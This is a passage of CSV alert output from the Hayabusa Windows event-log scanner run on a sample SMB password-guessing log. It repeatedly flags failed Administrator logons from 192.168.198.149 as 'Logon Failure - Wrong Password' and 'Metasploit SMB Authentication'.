Password,User: Administrator : Type: 3 : Workstation: ZMSWWzskoRfYBGny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.143 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GLm2PolKMBsYkPnN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.190 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2ZjHWhG2rXzYWskz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FOZzVedHYODB5Yvd : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.325 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xVaRybjI4HdZV0Zs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.372 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tTcl30MvvycjFcQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.411 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fVZqbCr9EwmV4gNE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.449 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zVwhii0TVmCkpDI0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.504 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Tx04CPPVa6WYY9G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.547 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gHyefIGqhIIy3ZI9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.584 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: Wrietoh4wgXcEvNd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.627 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9WW0Y5PW2JfCCdyR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tmXsMJ0ELK4qiNY6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yeftUqriSoxCgmDy : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.742 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 60JE9WQQ8N00j65B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.769 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r0rt2yVAEH6V4IIS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.816 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pay98C2Gr1di7qQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.852 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8TyPDYm9QCAmqj7h : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Dw3iK7DQMVXy8LW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BMuO0QEkxpKRv4Vl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:30.977 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: RaHECaQDXCXQc9Xw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.016 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ewXT2VcARiaNLIxJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.060 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dGSTrm4AOojs7So0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.110 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wVTBSk0Q65LkaTqg : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NjFN51w3T4VwuWa5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.209 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KG7a88h48ZEyOuYw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.248 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6ksKuTSGukc5em3B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.292 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPEMcGV6ZR92sWNY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.336 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iBQ6sKrRjb7BsySN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gDFnG1gv7jOeIQ0t : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.421 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: QdFKkcNpkfAScnkp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IAYbV4ioewwkZSmy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.511 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1bQ2Dxd6nlgSXJpo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.557 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: havLyoVCfdCqzrqO : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.596 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b2vZLhz19pXrq9iE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.648 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: A4TSN93DrSWb1ah4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.688 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QwFyrxiceLRTD9rI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ARbqo84Mr5T3ltRg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.762 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 34HpQJO17IDWber9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bSSbqOtdSeH58oIp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:31.978 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: EMvTo7fU6J468WE9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.009 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8gzx6Vr9LoInM1df : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.051 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kwXC2S4HwdwNE6SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.096 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1pQa1WxSt3bj9LEv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.136 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fm65jq9tRQznmWPh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.185 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zd8BJbXvEoaDADLc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.237 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: P0JlFw7S6jFUt4Iy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:50:32.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
